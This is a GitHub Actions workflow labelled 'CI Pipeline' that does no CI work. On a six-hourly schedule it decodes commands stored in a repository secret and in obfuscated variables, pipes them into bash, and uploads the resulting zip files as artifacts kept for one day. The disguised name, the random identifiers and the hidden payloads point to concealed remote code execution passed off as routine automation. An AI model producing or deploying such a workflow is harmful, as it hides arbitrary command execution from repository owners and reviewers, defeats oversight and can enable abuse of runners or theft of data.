name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '56 2,8,14,20 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          t40: ${{ secrets.t40 }}
        run: |
          printf '%s' "$t40" | jq -r .h17585 | /bin/bash
          printf '%s' "$wb822" | jq -r .bjkl333 | /bin/bash
          echo $cjmzj504 | jq -r .rkz889 | /bin/bash
          echo $r331 | jq -r .nw5 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: 28e52wbE
          path: "*.zip"
          retention-days: 1
